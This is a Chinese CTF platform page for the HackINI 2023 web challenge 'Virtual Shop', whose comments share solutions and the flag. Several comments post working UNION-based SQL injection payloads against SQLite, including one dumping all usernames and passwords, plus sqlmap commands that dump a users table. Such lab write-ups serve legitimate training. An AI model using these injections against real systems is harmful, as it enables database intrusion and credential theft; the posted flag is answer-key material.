Virtual ShopWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 441
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
评论
tdwj 8月前

一开始' union select 1,2,database(),4--+报错,看提示' union select 1,2,username,password from users--+倒是可出flag

回复 0

欧尼酱001 1年前

1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

回复 0
WCRH 1年前

这又不是post请求,你还保存上txt了

回复 0

.⎛⎝•̀ω•́⎠⎞. 2年前

只用sqlmap就可以做出来,很简单的一个注入

回复 0

FADogeCTF 2年前

union查询

回复 0

xiaobai568 2年前

前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了

回复 2

JJhello 2年前

sqlmap即可

回复 0

chaoge 2年前

sqlite,弄了半天认为是MySQL呢。

回复 0

justsosoloveyou 2年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1

SS3B 2年前

sqlmap一下子就出来了

回复 0

hopeinhand 2年前

联合查询注入,表名、列名、用户名全给了,都没啥好说的了

回复 0

WriteUp

image
heyile

1 金币

评分(0)

暂无评分

解题动态

lalala2022 攻破了该题 11小时前
lola 攻破了该题 3天前
pigpigG6768 攻破了该题 6天前
hsk_zy 攻破了该题 10天前
xyjwkg 攻破了该题 11天前
249190331 攻破了该题 13天前
kaito. 攻破了该题 16天前
xingzou 攻破了该题 18天前
wujita01 攻破了该题 22天前
sakuye 攻破了该题 23天前
tdyyyyyy 攻破了该题 23天前
kailiyizhong 攻破了该题 24天前
甘糖 攻破了该题 26天前
心胜于物 攻破了该题 1月前
mr.zhao 攻破了该题 1月前
seyana 攻破了该题 1月前
loonglone 攻破了该题 1月前
pigggg 攻破了该题 1月前
笛安丶 攻破了该题 1月前
tschick 攻破了该题 1月前
问题反馈